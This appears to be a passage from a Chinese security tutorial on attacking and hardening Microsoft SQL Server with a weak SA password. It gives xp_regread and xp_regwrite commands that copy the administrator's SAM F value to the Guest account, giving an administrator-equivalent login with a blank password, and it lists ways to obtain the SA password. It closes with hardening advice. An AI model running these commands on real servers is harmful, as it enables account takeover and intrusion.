Microsoft SQL Server SA弱口令攻防实战

xp_regread 'HKEY_LOCAL_MACHINE','SAMSAMDomainsAccountUsers00001F4','F'，

可以得到对方系统administrator的加密密码，然后复制，如图x.6所示。

图x.6　使用xp_regread得到加密密码

然后再执行：

xp_regwrite 'HKEY_LOCAL_MACHINE','SAMSAMDomainsAccountUsers00001F5
','F','reg_binary',0x（上面复制的那串字符），

如果对方有远程终端服务，那我们就可以用Guest用户登陆，密码为空，而且Guest的桌面与administrator的完全一样。

有很多种方法得到Microsoft SQLServer SA的密码，比如通过Sniffer到SA的加密密码，然后通过密码对照表(网上可以找到)，得到SA的明文密码，再比如通过SQL注入得到SA密码或者使用sp_password（修改数据库用户密码的存储过程）修改得到SA密码，还有可以挂密码字典进行暴力破解。一旦被SA密码被入侵者得到，会对服务器的安全带来很大隐患，所以我们整理了一个解决方案提供给大家：

1.在确定不需要的情况下，删除xp_cmdshell，xp_dirtree，xp_regread，xp_regdeletekey，xp_regdeletevalue，xp_regwrite，sp_oacreate，sp_oadestroy，sp_oagetErrorInfo，sp_oagetProperty，sp_oamethod，sp_oasetProperty，sp_oastop这些存储过程，移走相关的动态连接库文件，在需要的时候复制到原来的位置就可以了。

2.应用程序和网站在与后台的Microsoft SQLServer数据库连接时不要用SA等高权限的用户连接。

3.给SA等高权限的用户起一个健壮的密码。